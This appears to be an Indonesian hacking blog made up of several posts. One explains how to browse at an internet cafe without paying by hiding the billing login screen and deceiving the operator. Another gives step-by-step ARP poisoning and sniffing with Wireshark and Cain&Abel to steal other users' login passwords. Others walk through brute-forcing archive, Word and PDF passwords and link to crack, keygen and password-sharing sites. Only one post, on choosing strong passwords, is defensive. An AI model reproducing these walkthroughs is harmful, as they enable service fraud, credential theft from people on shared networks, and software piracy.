Setelah muter2 otak sebentar sambil tidur, akhirnya kutemukan cara buat ngakalin billing warnetnya buat ngirit ongkos online.
Kalau cara yang ada di X-Code Magz vol4 itu cuma bisa untuk Billing Explorer(memang bisa, saya sudah membuktikannya)
Cara ini berlaku untuk segala versi billing explorer dan kebanyakan aplikasi billing lainnya. Dan merupakan kelemahan semua billing warnet yang berbasis windows!!!

Penasaran mau tau caranya ? Baca aja sampai habis !
Skali lagi saya ingatkan buat anda yang merasa udah pinter diharapa ga usah baca, kecuali pengen mati kebosanan (niru kata-kata siapa ya?

Ini dia caranya …
Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat windows dimulai adalah login screen client billing yang menutupi seluruh area windows. Fungsi Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable untuk memaksa kita login melalui program billing itu.
Sebenarnya saat kita menghadapi login screen itu komputer sudah siap dijalankan. Hanya terhalang oleh screen login yang menyebalkan itu. Naah… udah tau apa yang bakal saya jelasin ? Kalo udah tau, brenti aja bacanya. Daripada mati kebosanan

Yess.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan jendela login itu tanpa perlu login. Ada banyak progie buat nyembunyiin window, salah satunya ZHider. Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang menggunakan progie laen silakan baca manualnya, tapi yang perlu diperhatikan adalah progie yang anda gunakan harus bisa show/hide window pake hotkey coz windows kita kan ditutupi sama login screen sialan itu.

Yang harus disiapkan:
1. Program ZHider. Cari sendiri pake om google. Ukurannya kecil kok, ga sampe setengah isi disket.
2. Muka bego
3. Mental yang kuat

Langkah-langkahnya:

01. Masuk warnet dan pasang muka bego biar ga dicurigai operator
02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga dicurigai juga sih.
03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa nggak.
04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.
05. Saat masuk login screen, login aja seperti biasa.
06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja pake google.
07. Setelah ZHider dijalankan langsung aja logout.
08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!
09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih ada yang belum login.
10. Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login screen yang menghilang entah kemana
11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai.
12. Logout. SIapkan muka bego, lalu bayar tarif.

Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila si op sering keluyuran.

Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file readme yang disertakan bersama zhider

CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.

Kalo cara di atas ga bisa dilakuin, hentikanlah usahamu. Sesungguhnya perbuatan jahatmu tidak diridhai Tuhan
Kalo ketahuan langsung pertebal “muka bego”-mu. Misalnya bilang “Eh, kok jadi gini ya? Kemaren ga gini kok.” Ato kata-kata lain, tergantung kreatifitas anda.

belajar menjebol password office ???

Posted by Rizky Prasetya 15.18, under |


Office Password Recovery Magic 6.1.1.22 adalah software yang bisa anda gunakan untuk merecovery atau menjebol password file dokumen office yang hilang atau lupa. File dokumen office apapun yang terpassword bahkan file dokumen office yang read only bisa anda temukan passwordnya dengan menggunakan Office Password Recovery Magic 6.1.1.22 ini. Office Password Recovery .
Magic 6.1.1.22 bisa untuk menemukan password office hingga office 2007.
Office Password Recovery Magic 6.1.1.22 memounyai user interface yang sangat mudah. Anda bisa menjebol password file dokumen microsoft office anda yang hilang atau lupa. Office Password Recovery Magic 6.1.1.22 bisa menemukan password office dengan mudah dan cepat.
Fitur utama Office Password Recovery Magic 6.1.1.22 :
1. menjebol password yang lupa atau hilang dengan cepat
2. menjebol password file dokumen microsoft word yang hilang atau lupa, bahkan jika file tersebut read only file.
3. menjebol password file dokumen microsoft excel yang hilang atau lupa, bahkan jika file tersebut read only file.
4. menjebol password file dokumen microsoft powerpoint yang hilang atau lupa, bahkan jika file tersebut read only file.
5. menjebol password file dokumen microsoft access yang hilang atau lupa, bahkan jika file tersebut read only file.
Office Password Recovery Magic 6.1.1.22 bisa digunakan untuk segala versi microsoft office hingga microsoft office 2007
Download software Office Password Recovery Magic 6.1.1.22 gratis di link di bawah ini :* http://94617fe0.realfiles.net* http://linkbee.com/jblpassoffice* http://4ad752f5.seriousfiles.com* http://64fdd5b6.thesefiles.com* http://6650b558.linkseer.net

TUTORIAL LAN Hacking (Buat Newbie yang mau belajar hack) ???

Posted by Rizky Prasetya 15.16, under |


Cara hacking via LAN (untuk curi pass orang2 yang lagi browsing)

Pertama-tama sorry kalo repost karena teknik ini bukanlah teknik yang fresh di dunia hacking tapi teknik ini belum basi karena sampai saat ini masih dapat digunakan karena sebagian besar jaringan meggunakan jaringan hub & switch yang tidak terenkripsi.
Mengapa tidak terenkripsi?

* Network Admin sebagian besar adalah orang IT yang specialist dalam membuat program, bukan dalam Network Security
* Bila dienkripsi bandwidth yang dibuthkan akan meningkat dan tentu inet yang sudah lemot ini akan semakin lemot dan akhirnya page error
* Harganya tidak murah untuk memperoleh yang terenkripsi

Perbedaan antara jaringan Hub dan Switch:

* Pada jaringan hub semua data yang mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo tidak direquest ya tidak akan datang.
* Pada jaringan switch hanya komputer yang melakukan pertukaran data yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest data tersebut.

Masalahnya adalah harga dari router hub dan switch tidak berbeda jauh sehingga kebanyakan tempat sekarang sudah menggunakan metode switch yang menyulitkan untuk network hacking.

Hacking ini menggunakan teknik:

* Sniffing
* ARP Poison Routing

Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.

Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda

Kelebihan:

* Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan bukan pada komputernya
* Bisa mencuri semua jenis login password yang melalui server HTTP
* Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
* Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
* Semua programnya free

Kekurangan:

* Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat ga masalah)
* Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya

Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:

* Komputer Korban
* Komputer Hacker
* Server

Perbedaan-perbedaan antara jaringan switch dan jaringan hub:
Langkah-langkah pertama:

1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.
Code:
http://www.wireshark.org/download.html
http://www.oxid.it/cain.html
Cara Menggunakan WireShark:

* Jalankan program wireshark
* Tekan tombol Ctrl+k (klik capture lalu option)
* Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan pastikan pula bahwa “Capture packets in promiscuous mode” on
* Klik tombol start
* Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol start
* Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich
* Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik “Follow TCP Stream” dan selamat menganalisis paketnya (saya tidak akan menjelaskan caranya karena saya tidak bisa )
* Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban ke website dan sebaliknya

Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.

Cara Menggunakan Cain&Abel:

* Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program wireshark
* Buka program Cain anda
* Klik pada bagian configure
* Pada bagian “Sniffer” pilih ethernet card yang akan anda gunakan
* Pada bagian “HTTP Fields” anda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar.
Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanyan sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun.
* Setelah itu apply settingannya dan klik ok
* Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab “Sniffer” karena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri
* Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya “Start/Stop Sniffer”
* Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) “Passwords”
* Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana
* Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)
* Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR
* Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol “+” (Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll
* Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda
* Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
* Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.

Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.

Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini)

Untuk istilah-istilah yang tidak ngerti bisa dicari di wikipedia (tapi yang inggris ya kalo yang indo jg belum tentu ada).

Bagaimana membuat password yang sulit dibobol hacker??

Posted by Rizky Prasetya 15.13, under |


Jaman sekarang yang namanya hacker atau cracker semakin kreatif, dengan berbagai cara mereka berusaha menembus email Anda, friendster, rekening online, web site, bahkan blog.Anda tidak mau kan, kalau suatu saat profile Anda di friendster diubah oleh orang? Atau web site Anda tiba-tiba di ganti tampilannya oleh hacker / cracker ?
Salah satu cara hacker menembus account kita adalah dengan cara menebak password. Hacker menggunakan script yang dapat memasukkan puluhan password tiap detik untuk mencoba masuk ke dalam account kita.
Cara hacker menebak password kita antara lain dengan
Brute force attack, yaitu dengan mencoba semua kombinasi, mulai dari aaaa sampai zzzz, sampai beberapa karakter.
Dictionary attack, yaitu dengan menebak menggunakan kata-kata dalam kamus, dan dikombinasikan dengan angka-angka atau karakter.
Personal information attack, dengan cara memasukkan data-data pribadi seperti nomor telepon, tanggal lahir, nama pacar, kode pos, dan sebagainya.
Password yang sangat lemah akan sangat mudah dibobol hacker dengan cara ini. Contoh password yang sangat lemah misalnya:
123456, qwerty, asdf, ini karena mudah sekali orang mengetik kombinasi ini di keyboard.
password, mypassword, dan lain-lain yang menggunakan kata-kata dalam kamus (semua bahasa).
tanggal lahir, nama pacar, dan lainnya yang merupakan data diri orang tersebut.
Password yang lemah, bisa dibobol dalam waktu yang lebih cepat, misalnya:
menggunakan semua huruf kecil.
menggunakan kombinasi kata dan angka, misalnya buku10, teroris80.
mengganti huruf dengan karakter, misalnya c1nt@
Bagaimana password yang kuat dan sulit ditembus hacker?
Merupakan kombinasi dari huruf besar, huruf kecil, nomor, dan karakter.
Panjang lebih dari 10 karakter.
Tidak menyertakan kata-kata dalam kamus.
Password yang kuat harus mudah diingat oleh pemiliknya.
Contoh password yang kuat: 1mAu$100Ribu
Cara mengingatnya:
1 = kata “saya” diterjemahkan dalam bahasa Inggris (I).
mAu = mau
$ = uang
100Ribu = 100 ribu
Contoh password kuat yang lain: ninG->0+1Gul
Cara mengingatnya:
ninG = misalnya nama orang sepesial buat Anda: Naning
-> = panah identik dengan adalah
0+ = lambang cewek
1 =berarti nomor satu atau paling
Gul = gula itu manis
Beberapa tips:
Jangan menggunakan password yang sama untuk berbagai macam layanan, misalnya password email Anda sama dengan password friendster. Ini berarti:
seseorang yang dapat menjebol password friendster Anda, bisa juga menjebol password email Anda. Sementara di mata hacker menjebol password friendster lebih mudah daripada menjebol email Yahoo.
admin atau “orang dalam” friendster tahu password Anda, dia juga bisa memasukkan password tersebut ke email Anda.
Jangan mengklik link di email yang menyatakan Anda harus memverifikasi password Anda. Email ini dikirim oleh hacker.
Jangan memasukkan password disitus selain yang memberikan layanan. Misalnya jangan memasukkan password yahoo di situs friendster untuk alasan apapun (misalnya import address book).
Sebelum login ke email atau yang lain, pastikan URL di browser Anda benar. Misalnya mail.yahoo.com bukan mail.yahoo-ltd.com atau yahoo-verify.com atau yang lain.
Untuk rekening online seperti e-gold, klik BCA, paypal, sebaiknya Anda tidak mengetik password Anda lewat keyboard (karena hacker bisa membaca keyboard Anda dengan program keylogger). Gunakan On Screen Keyboard, Charakter Map, atau copy paste dari huruf acak.
Okey begitulah tips-tips agar password kita sulit dibobol hacker. Semoga dengan tips ini account kita aman dan terhindar dari kebobolan.

cara membobol password winrar

Posted by Rizky Prasetya 15.10, under |


PASSWORD WINZIP

Winzip adalah tool yang digunakan untuk mengkompresi file sehingga ukuran file yang besar bisa dikurangi kapasitasnya. Winzip juga memiliki fasilitas proteksi pada file yang dikompresinya, sehingga ketika anda hendak mengekstrak file, maka akan muncul prompt password. Hal ini bisa terjadi karena file tersebut memang benar-benar rahasia dan penting. Namun sebelumnya kita akan belajar bagaimana memberikan password pada file yang dikompresi dengan Winzip.


# Cara Memberikan Password di Winzip

Untuk Winzip yang akan digunakan adalah versi 10 atau sebelumnya. Berikut adalah langkah-langkah penggunaannya :

1. Buka Windows Explorer anda.

2. Siapkan file atau folder yang akan dicoba untuk dikompres dengan Winzip.

3. Klik kanan pada folder yang akan di-Zip, pilih menu Winzip > Add to Zip file.

4. Setelah dipilih akan tampil kotak dialog Add. Pada bagian Option beri tanda checklist pada Encrypt added files.

5. Jika sudah, klik tombol Add.

6. Kalau ada kotak dialog Winzip Caution, klik saja OK.

7. Selanjutnya akan tampil kotak dialog Encrypt. Masukkan password yang hendak dibuat pada field Enter Password dan masukkan kembali pada field Re-enter password (for confirmation). Untuk Encryption method pilih Zip 2.0 compatible encryption (portable).

8. Jika sudah klik OK.

9. Proses kompresi file sudah dilakukan dan telah diberikan password.

10. Sekarang cobalah untuk mengekstraknya. Kalau ada permintaan password berarti anda telah berhasil memberikan password pada file zip anda.

# Cara Menjebol Password di Winzip

Untuk mencoba untuk menjebol Password Winzip ini, tool yang akan digunakan adalah “Zip Password Finder”. Ukuran filenya cuma 483 kb (sebelum diekstrak). Jika anda belum memiliki, bisa juga didownload dari situs: http://www.astonsoft.com/m

Berikut langkah-langkah cara penggunaannya setelah terinstall toolnya :

1. Karena file ini aslinya di-Zip, maka anda harus mengekstraknya terlebih dahulu.

2. Jika sudah, jalankan program tersebut.

3. Selanjutnya kita akan menentukan file zip yang akan kita jebol password-nya. Klik icon Open

4. Pada kotak dialog Open pilih file Zip yang sudah diberi password. Kemudian klik Open.

5. Setelah filenya dipanggil, lakukan pengaturan sebagai berikut pada opsi Char Type Property : Alpha (lower) (a-z), sedangkan untuk Max Password Length : 5.

6. Jika sudah, klik icon Start.

7. Untuk menampilkan proses pencarian password, anda bisa mengklik icon Display On.

8. Akhirnya setelah memakan waktu yang cukup lama, Password Zip-nya sudah bisa ditebak yang bisa dilihat pada Menu Control > Starting Password.

9. Sekarang anda coba untuk mengekstrak filenya dan masukkan password yang sudah didapat tadi. Jika benar setelah diisi, maka berarti anda berhasil untuk menjebolnya. :-)


--------------------------------------------------------------------------------

Page 2


2. PASSWORD WINRAR

Winrar fungsinya tidak lain atau sama halnya dengan fungsi Winzip yakni untuk mengkompres file, ekstensi filenya saja yang sama. Winrar juga memiliki fasilitas yang hampir sama dengan Winzip, yaitu fasilitas password.

# Cara Memberikan Password di Winrar

Winrar yang akan digunakan adalah versi 3.71 atau sebelumnya, anda bisa mendownloadnya melalui situs : http://www.rarlab.com./. Berikut adalah langkah-langkah untuk memberikan password pada Winrar.

1. Buka Windows Explorer anda.

2. Siapkan file atau folder yang akan dicoba untuk dikompres dengan Winrar.

3. Klik kanan pada folder yang akan di-Zip, pilih Add to Archive.

4. Setelah dipilih akan tampil kotak dialog Archive name and parameters, pilih tab Advanced, kemudian pilih lagi icon Set Password.

5. Pada kotak dialog Archiving with password, masukkan password yang anda maksud dengan mengetikkan pada kota Enter password yang tersedia, lanjutkan juga dengan mengetikkan password yang sama pada Reenter password for verification. Dalam contoh ini tidak menggunakan password yang panjang, untuk mempersingkat waktu tentunya.

6. Kalau sudah, klik saja OK.

7. Klik lagi OK, selanjutnya akan terjadi proses kompresi.

8. Kalau anda mengekstraknya, otomatis akan muncul permintaan password terlebih dahulu.

# Cara Menjebol Password di Winrar

Tool yang bisa kita pergunakan untuk membongkar password di Winrar adalah “RAR Password Recovery”, ukuran filenya juga tidak terlalu besar. Anda bisa mendownloadnya dari situs: http://www.intelore.com/rar_password_recovery.php, Agar beberapa fitur dalam software ini bisa digunakan maka anda harus mencari crack dan keygen-nya terlebih dahulu di http://crack-/keygen.com untuk bisa leluasa menggunakan fitur-fitur yang ada tersebut.

Berikut langkah-langkah cara penggunaannya setelah terinstall toolnya :

1. Klik icon open pada kotak dialog RAR Password Recovery untuk memilih file rar yang sudah diberi password.

2. Pada kotak dialog Open, pilih file yang sudah anda kompres menggunakan Winrar (berbentuk icon buku bertumpuk).

3. Lalu klik Open.

4. Pada opsi Allowed Characters, pilih All printable symbols, opsi ini dipilih untuk menentukan segala kemungkinan karakter yang diinputkan. Sedangkan untuk Type of attact, pilih Brute Force (mencoba segala kemungkinan).

5. Dilanjutkan dengan memilih Password Length, untuk Minimal Length pilih 3 character sedangkan untuk Maximal Length, pilih 5 character.

6. Terakhir, di bagian Advanced Options pada opsi Start from, ketik abc. Untuk opsi lainnya untuk saat ini tidak anda atur.

7. Lanjutkan dengan mengklik tombol Start.

8. Beberapa saat kemudian, pada kotak dialog Password recovered, password yang dimaksud bisa ditemukan pada opsi Password.

9. Sekarang anda coba untuk mengekstrak filenya dan masukkan password yang sudah didapat tadi. Jika benar setelah diisi, maka berarti anda berhasil untuk menjebolnya. :-)


--------------------------------------------------------------------------------

Page 3


3. PASSWORD MICROSOFT WORD

Memberi password pada file dokumen Office sangat penting dilakukan agar file yang telah dibuat tidak dapat diketahui isinya oleh orang-orang yang tidak berkepentingan. Berikut ini cara-cara memberi password pada Microsoft Office :

# Cara Memberikan Password di Microsoft Word

1. Siapkan file Microsoft Word yang akan anda berikan passwordnya.

2. Pilih menu Tools > Options.

3. Setelah tampil kotak dialog Option, lalu anda pilih tab Security. Pada tab Security di bagian Password to Open, masukan password yang anda inginkan. Sedangkan untuk Password to modify kita kosongkan dulu untuk sementara.

4. Jika sudah, lalu klik OK.

5. Lalu akan tampil kotak dialog konfirmasi untuk Reenter password to open. Masukkan kembali password-nya telah anda inputkan.

6. Jika sudah, lalu klik OK.

7. Kemudian Save dokumen tersebut, pilih Close untuk keluar dari program Microsoft Word.

8. Lalu coba buka dokumen Word yang baru saja telah diberi Password, apa yang terjadi?

9. Coba masukkan kode password yang telah anda beri pada kotak dialog Enter password to open file.

10. Kalau anda benar memasukan kodenya, berarti tidak ada masalah. Kalau tidak tahu kode passwordnya? Nggak bisa buka datanya kan? Mau tau cara untuk menjebol passwordnya?

# Cara Menjebol Password di Microsoft Word

Untuk mencoba untuk menjebol file Microsoft Word, sebelumnya kita harus memiliki file yang bernama “Word Password Recovery”. Dengan mengunjungi alamat situs berikut, silahkan download softwarenya : http://www.freewordexcelpassword.com.

Berikut langkah-langkah cara penggunaannya setelah didownload filenya :

1. Pada kotak dialog “Free Word and Excel password recovery wizard”, klik tombol Next atau klik tab Select file. Lalu pada kotak dialog Select Word or Excel File di File of type, pilih Word files (*.doc), lalu pilih file yang sudah anda beri password tadi.

2. Kemudian klik Open.

3. Setelah file Word ditentukan, selanjutnya anda klik tab Dictionary recovery. Pada bagian ini anda bisa menentukan dictionary (kamus) yang isinya merupakan kata-kata yang berhubungan dengan password yang akan ditebak. Biasanya disimpan dalam bentuk file *.txt atau *.dic. Untuk kali ini kita lewati langkah ini dan lanjutkan dengan mengklik tab Brute force recovery.

4. Pada Brute force recovery anda tentukan Character yang mungkin diinputkan dan tentukan juga panjang karakter yang diinputkan pada opsi From (length). Lalu klik tombol Next.

5. Tunggu beberapa saat sampai proses pencarian selesai. Lama proses pencarian tergantung dari jenis karakter dan panjang karakter yang diinputkan.

6. Tidak lama kemudian password anda ditemukan, ditandai dengan muncul kotak dialog “Excel File Password Recovery” (kotak dialog ini memang namanya “Excel File Password Recovery” walaupun yang dicarinya adalah file Word).

7. Jika sudah, klik OK.

8. Sekarang buka file dokumen Word yang diberi password tadi, lalu masukkan kode passwordyang telah ditemukan barusan, lalu klik OK. Apa yang terjadi, sudah bisa dibuka kan, datanya? :-)


--------------------------------------------------------------------------------

Page 4


4. PASSWORD FILE PDF

Suatu saat anda mendownload file E-book format PDF, namun adakalanya file hasil download tersebut diproteksi oleh password. Lalu bagaimana cara membongkarnya agar password tersebut bisa diketahui dan file PDF-nya bisa kita buka secara normal? Lalu, bagaimana pula halnya bila kita ingin membuat proteksi password pada file PDF yang telah kita buat? Disini kita akan mencoba membuat file PDF yang diproteksi oleh password. Adobe Acrobat Reader yang akan kita gunakan adalah versi 5.0 atau dibawahnya.

# Cara Memberikan Password File PDF

1. Coba buka salah satu file PDF yang anda miliki, lalu setelah tampil pilih File > Document Security.

2. Pada opsi Security Options, pilih Standard Security dengan mengklik anak panah kecil.

3. Yang akan kita lakukan adalah hanya memproteksi untuk open dokumen, karena itu anda beri tanda checklist pada Password Required to Open Document. Pada textbox User Password, masukan password yang ingin anda gunakan.

4. Lalu klik OK.

5. Masukan lagi konfirmasi password, klik OK.

6. Kemudian Close.

7. Simpan dokumen PDF anda, tekan Ctrl-S.

8. Kemudian keluar dari aplikasi dengan memilih menu File > Close. Sekarang coba buka file PDF yang barusan sudah anda beri password tersebut, apa meminta konfirmasi untuk mengisi kode passwordnya? Jika passwordnya, benar berarti tidak ada masalah. Kalau misalnya password yang anda beri tersebut lupa atau tidak tahu bagaimana.

# Cara Menjebol Password File PDF

Berikut ini cara paling mudah untuk membongkar password pada file PDF. Untuk mencoba untuk menjebol file PDF, kita akan coba gunakan tool keluaran Elcomsoft, yakni “Advanced PDF Password Recovery”. Tool ini tidak terlalu besar filenya, dan bisa anda download melalui situs : http://www.elcomsoft.com/apdfpr.html

Berikut langkah-langkah cara penggunaan tool Advanced PDF Password Recovery :

1. Setelah anda jalankan tool yang dimaksud, pada tab Range beri tanda checklist pada opsi All Printable.

2. Kemudian pada tab Length, Minimal password length : 1 character (s) dan Maximal password length : 4 character (s).

3. Type of attact : Brute-force atau mencoba segala kemungkinan.

4. Setelah itu pilih menu File > Open File atau dengan mengklik icon Load PDF – file into the project.

5. Pilih file PDF yang tadi sudah diberi password, klik tombol Open.

6. Jika muncul kotak dialog APDFPR, klik opsi Start recovery.

7. Tunggu beberapa saat pada proses pencarian password berlangsung.

8. Jika setelah itu muncul kotak dialog Password successfully recovered ! Berarti passwordnya sudah ditemukan. Silahkan salin passwordnya.

9. Setelah itu, coba buka file PDF yang sudah dipassword tadi kemudian isi password yang sudah ditemukan barusan. Terbukti bukan?! :-)


--------------------------------------------------------------------------------

Page 5


Jika kebetulan anda membuka salah satu situs untuk download software, game, musik, video, dll. Biasanya untuk situs yang berbayar mengharuskan kita untuk memiliki kode password MEMBER yang harus dibelinya. Ada banyak cara yang bisa kita pilih. Untuk software full versi, biasanya memerlukan file crack, yang disini saya akan beritahu dimana kita bisa mendapatkan software full versi tersebut atau mendapatkan file cracknya.

1. Silahkan anda coba cari file gratisan tersebut di salah satu situs ini :

http://www.trialsoft.org/

http://www.freewarehome.com/

http://www.freewareweb.com/

http://www.freewareworld.com/

http://www.freeware4pc.com/

http://www.crack-keygen.com/

http://www.keygencrack.com/

http://www.ddl2.com/

http://www.iceddl.com/

2. Untuk mendownload situs berbayar (photo & video), silahkan klik situs berikut ini :

http://www.ultrapassword.com/

http://www.passworduniverse.com/

http://www.ftvgirls.com/

"Good Luck My Friend's!"